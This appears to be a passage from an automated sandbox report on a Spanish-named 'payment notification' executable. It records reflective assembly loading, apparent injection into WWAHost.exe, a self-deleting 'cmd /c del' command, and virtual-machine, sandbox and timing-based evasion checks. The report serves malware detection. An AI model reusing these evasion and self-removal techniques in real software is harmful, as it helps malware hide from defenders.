          Source: Binary string: FormatExcept.pdb8A source: Notificaci#U00f3n de pago.exe
          Source: Binary string: WWAHost.pdbUGP source: Notificaci#U00f3n de pago.exe, 00000008.00000002.386556688.0000000003820000.00000040.10000000.00040000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.381620800.0000000003900000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.381239954.0000000003825000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: Notificaci#U00f3n de pago.exe, 00000008.00000002.384074601.0000000001A50000.00000040.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000002.385236446.0000000001B6F000.00000040.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.308300902.00000000018B3000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.306800992.000000000171A000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000003.383100819.00000000035F7000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000003.385157630.0000000003790000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Notificaci#U00f3n de pago.exe, 00000008.00000002.384074601.0000000001A50000.00000040.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000002.385236446.0000000001B6F000.00000040.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.308300902.00000000018B3000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.306800992.000000000171A000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, WWAHost.exe, 0000000E.00000003.383100819.00000000035F7000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000003.385157630.0000000003790000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: FormatExcept.pdb source: Notificaci#U00f3n de pago.exe

          Data Obfuscation

          Source: Notificaci#U00f3n de pago.exe, Rw/FJ.cs.Net Code: Qyc System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.Notificaci#U00f3n de pago.exe.b90000.0.unpack, Rw/FJ.cs.Net Code: Qyc System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.Notificaci#U00f3n de pago.exe.b90000.0.unpack, Rw/FJ.cs.Net Code: Qyc System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.7.unpack, Rw/FJ.cs.Net Code: Qyc System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.9.unpack, Rw/FJ.cs.Net Code: Qyc System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.2.Notificaci#U00f3n de pago.exe.e10000.1.unpack, Rw/FJ.cs.Net Code: Qyc System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.3.unpack, Rw/FJ.cs.Net Code: Qyc System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.1.unpack, Rw/FJ.cs.Net Code: Qyc System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.5.unpack, Rw/FJ.cs.Net Code: Qyc System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.0.unpack, Rw/FJ.cs.Net Code: Qyc System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.2.unpack, Rw/FJ.cs.Net Code: Qyc System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: Notificaci#U00f3n de pago.exe, Rw/FJ.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "456E756D43617465676F7279496E7374616E636573466C", "7763786A4E67544675", "PagedOptionsDialog" } }, null, null)
          Source: 0.2.Notificaci#U00f3n de pago.exe.b90000.0.unpack, Rw/FJ.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "456E756D43617465676F7279496E7374616E636573466C", "7763786A4E67544675", "PagedOptionsDialog" } }, null, null)
          Source: 0.0.Notificaci#U00f3n de pago.exe.b90000.0.unpack, Rw/FJ.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "456E756D43617465676F7279496E7374616E636573466C", "7763786A4E67544675", "PagedOptionsDialog" } }, null, null)
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.7.unpack, Rw/FJ.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "456E756D43617465676F7279496E7374616E636573466C", "7763786A4E67544675", "PagedOptionsDialog" } }, null, null)
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.9.unpack, Rw/FJ.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "456E756D43617465676F7279496E7374616E636573466C", "7763786A4E67544675", "PagedOptionsDialog" } }, null, null)
          Source: 8.2.Notificaci#U00f3n de pago.exe.e10000.1.unpack, Rw/FJ.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "456E756D43617465676F7279496E7374616E636573466C", "7763786A4E67544675", "PagedOptionsDialog" } }, null, null)
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.3.unpack, Rw/FJ.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "456E756D43617465676F7279496E7374616E636573466C", "7763786A4E67544675", "PagedOptionsDialog" } }, null, null)
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.1.unpack, Rw/FJ.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "456E756D43617465676F7279496E7374616E636573466C", "7763786A4E67544675", "PagedOptionsDialog" } }, null, null)
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.5.unpack, Rw/FJ.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "456E756D43617465676F7279496E7374616E636573466C", "7763786A4E67544675", "PagedOptionsDialog" } }, null, null)
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.0.unpack, Rw/FJ.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "456E756D43617465676F7279496E7374616E636573466C", "7763786A4E67544675", "PagedOptionsDialog" } }, null, null)
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.2.unpack, Rw/FJ.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "456E756D43617465676F7279496E7374616E636573466C", "7763786A4E67544675", "PagedOptionsDialog" } }, null, null)
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 0_2_00B98EDF push ss; retf 0_2_00B98EF6
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041A082 push 01F04D8Ch; iretd 8_2_0041A08B
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_00416D1E push ds; retf 8_2_00416D1F
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_00416DE0 push es; iretd 8_2_00416DE1
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041D662 push eax; ret 8_2_0041D668
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041D66B push eax; ret 8_2_0041D6D2
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041D615 push eax; ret 8_2_0041D668
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041D6CC push eax; ret 8_2_0041D6D2
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041E773 push ecx; ret 8_2_0041E774
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_00E18EDF push ss; retf 8_2_00E18EF6
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039AD0D1 push ecx; ret 14_2_039AD0E4
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7A082 push 01F04D8Ch; iretd 14_2_00A7A08B
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A76DE0 push es; iretd 14_2_00A76DE1
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A76D1E push ds; retf 14_2_00A76D1F
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7D6CC push eax; ret 14_2_00A7D6D2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7D615 push eax; ret 14_2_00A7D668
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7D662 push eax; ret 14_2_00A7D668
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7D66B push eax; ret 14_2_00A7D6D2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7E773 push ecx; ret 14_2_00A7E774
          Source: initial sampleStatic PE information: section name: .text entropy: 7.92135270708
          Source: Notificaci#U00f3n de pago.exe, Rw/Yt.csHigh entropy of concatenated method names: 'az', 'Jys', 'pyd', 'hyI', '.ctor', 'pR', 'xT', 'sq', 'd3', 'G9'
          Source: 0.2.Notificaci#U00f3n de pago.exe.b90000.0.unpack, Rw/Yt.csHigh entropy of concatenated method names: 'az', 'Jys', 'pyd', 'hyI', '.ctor', 'pR', 'xT', 'sq', 'd3', 'G9'
          Source: 0.0.Notificaci#U00f3n de pago.exe.b90000.0.unpack, Rw/Yt.csHigh entropy of concatenated method names: 'az', 'Jys', 'pyd', 'hyI', '.ctor', 'pR', 'xT', 'sq', 'd3', 'G9'
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.7.unpack, Rw/Yt.csHigh entropy of concatenated method names: 'az', 'Jys', 'pyd', 'hyI', '.ctor', 'pR', 'xT', 'sq', 'd3', 'G9'
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.9.unpack, Rw/Yt.csHigh entropy of concatenated method names: 'az', 'Jys', 'pyd', 'hyI', '.ctor', 'pR', 'xT', 'sq', 'd3', 'G9'
          Source: 8.2.Notificaci#U00f3n de pago.exe.e10000.1.unpack, Rw/Yt.csHigh entropy of concatenated method names: 'az', 'Jys', 'pyd', 'hyI', '.ctor', 'pR', 'xT', 'sq', 'd3', 'G9'
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.3.unpack, Rw/Yt.csHigh entropy of concatenated method names: 'az', 'Jys', 'pyd', 'hyI', '.ctor', 'pR', 'xT', 'sq', 'd3', 'G9'
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.1.unpack, Rw/Yt.csHigh entropy of concatenated method names: 'az', 'Jys', 'pyd', 'hyI', '.ctor', 'pR', 'xT', 'sq', 'd3', 'G9'
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.5.unpack, Rw/Yt.csHigh entropy of concatenated method names: 'az', 'Jys', 'pyd', 'hyI', '.ctor', 'pR', 'xT', 'sq', 'd3', 'G9'
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.0.unpack, Rw/Yt.csHigh entropy of concatenated method names: 'az', 'Jys', 'pyd', 'hyI', '.ctor', 'pR', 'xT', 'sq', 'd3', 'G9'
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.2.unpack, Rw/Yt.csHigh entropy of concatenated method names: 'az', 'Jys', 'pyd', 'hyI', '.ctor', 'pR', 'xT', 'sq', 'd3', 'G9'

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: /c del "C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe"
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: Yara matchFile source: 00000000.00000002.310331717.0000000002FB8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.310059804.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Notificaci#U00f3n de pago.exe PID: 6360, type: MEMORYSTR
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.310331717.0000000002FB8000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000002.310059804.0000000002F31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.310331717.0000000002FB8000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000002.310059804.0000000002F31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeRDTSC instruction interceptor: First address: 0000000000408C04 second address: 0000000000408C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeRDTSC instruction interceptor: First address: 0000000000408F8E second address: 0000000000408F94 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\WWAHost.exeRDTSC instruction interceptor: First address: 0000000000A68C04 second address: 0000000000A68C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\WWAHost.exeRDTSC instruction interceptor: First address: 0000000000A68F8E second address: 0000000000A68F94 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe TID: 6364Thread sleep time: -45733s >= -30000s
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe TID: 6448Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WWAHost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_00408EC0 rdtsc 8_2_00408EC0
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WWAHost.exeAPI coverage: 9.4 %
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeThread delayed: delay time: 45733
          Source: explorer.exe, 0000000B.00000000.323171776.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 0000000B.00000000.367419056.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}m&ven_n
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.310059804.0000000002F31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 0000000B.00000000.429366333.0000000000680000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&280b647&
          Source: explorer.exe, 0000000B.00000000.340384303.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.310059804.0000000002F31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
          Source: explorer.exe, 0000000B.00000000.367419056.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 0000000B.00000000.435360812.00000000062C4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000B.00000000.367419056.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}+]e
          Source: explorer.exe, 0000000B.00000000.360151542.0000000004287000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
          Source: explorer.exe, 0000000B.00000000.367419056.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}^
          Source: explorer.exe, 0000000B.00000000.323914419.000000000820E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.310059804.0000000002F31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 0000000B.00000000.323171776.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 0000000B.00000000.367419056.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00l
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.310059804.0000000002F31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A25BA5 mov eax, dword ptr fs:[00000030h]14_2_03A25BA5
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398B390 mov eax, dword ptr fs:[00000030h]14_2_0398B390
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03982397 mov eax, dword ptr fs:[00000030h]14_2_03982397
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03961B8F mov eax, dword ptr fs:[00000030h]14_2_03961B8F
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A0D380 mov ecx, dword ptr fs:[00000030h]14_2_03A0D380
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A1138A mov eax, dword ptr fs:[00000030h]14_2_03A1138A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03984BAD mov eax, dword ptr fs:[00000030h]14_2_03984BAD
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D53CA mov eax, dword ptr fs:[00000030h]14_2_039D53CA
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039803E2 mov eax, dword ptr fs:[00000030h]14_2_039803E2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0397DBE9 mov eax, dword ptr fs:[00000030h]14_2_0397DBE9
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A1131B mov eax, dword ptr fs:[00000030h]14_2_03A1131B
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0395F358 mov eax, dword ptr fs:[00000030h]14_2_0395F358
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0395DB40 mov eax, dword ptr fs:[00000030h]14_2_0395DB40
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03983B7A mov eax, dword ptr fs:[00000030h]14_2_03983B7A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0395DB60 mov ecx, dword ptr fs:[00000030h]14_2_0395DB60
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A28B58 mov eax, dword ptr fs:[00000030h]14_2_03A28B58
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398D294 mov eax, dword ptr fs:[00000030h]14_2_0398D294
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0396AAB0 mov eax, dword ptr fs:[00000030h]14_2_0396AAB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398FAB0 mov eax, dword ptr fs:[00000030h]14_2_0398FAB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039552A5 mov eax, dword ptr fs:[00000030h]14_2_039552A5
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03982ACB mov eax, dword ptr fs:[00000030h]14_2_03982ACB
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03982AE4 mov eax, dword ptr fs:[00000030h]14_2_03982AE4
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0395AA16 mov eax, dword ptr fs:[00000030h]14_2_0395AA16
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03955210 mov eax, dword ptr fs:[00000030h]14_2_03955210
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03955210 mov ecx, dword ptr fs:[00000030h]14_2_03955210
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03973A1C mov eax, dword ptr fs:[00000030h]14_2_03973A1C
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03968A0A mov eax, dword ptr fs:[00000030h]14_2_03968A0A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03994A2C mov eax, dword ptr fs:[00000030h]14_2_03994A2C
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A1AA16 mov eax, dword ptr fs:[00000030h]14_2_03A1AA16
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A0B260 mov eax, dword ptr fs:[00000030h]14_2_03A0B260
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A28A62 mov eax, dword ptr fs:[00000030h]14_2_03A28A62
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039E4257 mov eax, dword ptr fs:[00000030h]14_2_039E4257
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03959240 mov eax, dword ptr fs:[00000030h]14_2_03959240
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0399927A mov eax, dword ptr fs:[00000030h]14_2_0399927A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A1EA55 mov eax, dword ptr fs:[00000030h]14_2_03A1EA55
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03982990 mov eax, dword ptr fs:[00000030h]14_2_03982990
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0397C182 mov eax, dword ptr fs:[00000030h]14_2_0397C182
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398A185 mov eax, dword ptr fs:[00000030h]14_2_0398A185
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D51BE mov eax, dword ptr fs:[00000030h]14_2_039D51BE
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039861A0 mov eax, dword ptr fs:[00000030h]14_2_039861A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D69A6 mov eax, dword ptr fs:[00000030h]14_2_039D69A6
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0395B1E1 mov eax, dword ptr fs:[00000030h]14_2_0395B1E1
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039E41E8 mov eax, dword ptr fs:[00000030h]14_2_039E41E8
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03959100 mov eax, dword ptr fs:[00000030h]14_2_03959100
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398513A mov eax, dword ptr fs:[00000030h]14_2_0398513A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03974120 mov eax, dword ptr fs:[00000030h]14_2_03974120
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03974120 mov ecx, dword ptr fs:[00000030h]14_2_03974120
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0397B944 mov eax, dword ptr fs:[00000030h]14_2_0397B944
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0395B171 mov eax, dword ptr fs:[00000030h]14_2_0395B171
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0395C962 mov eax, dword ptr fs:[00000030h]14_2_0395C962
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03959080 mov eax, dword ptr fs:[00000030h]14_2_03959080
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D3884 mov eax, dword ptr fs:[00000030h]14_2_039D3884
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398F0BF mov ecx, dword ptr fs:[00000030h]14_2_0398F0BF
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398F0BF mov eax, dword ptr fs:[00000030h]14_2_0398F0BF
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039990AF mov eax, dword ptr fs:[00000030h]14_2_039990AF
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039820A0 mov eax, dword ptr fs:[00000030h]14_2_039820A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039EB8D0 mov eax, dword ptr fs:[00000030h]14_2_039EB8D0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039EB8D0 mov ecx, dword ptr fs:[00000030h]14_2_039EB8D0
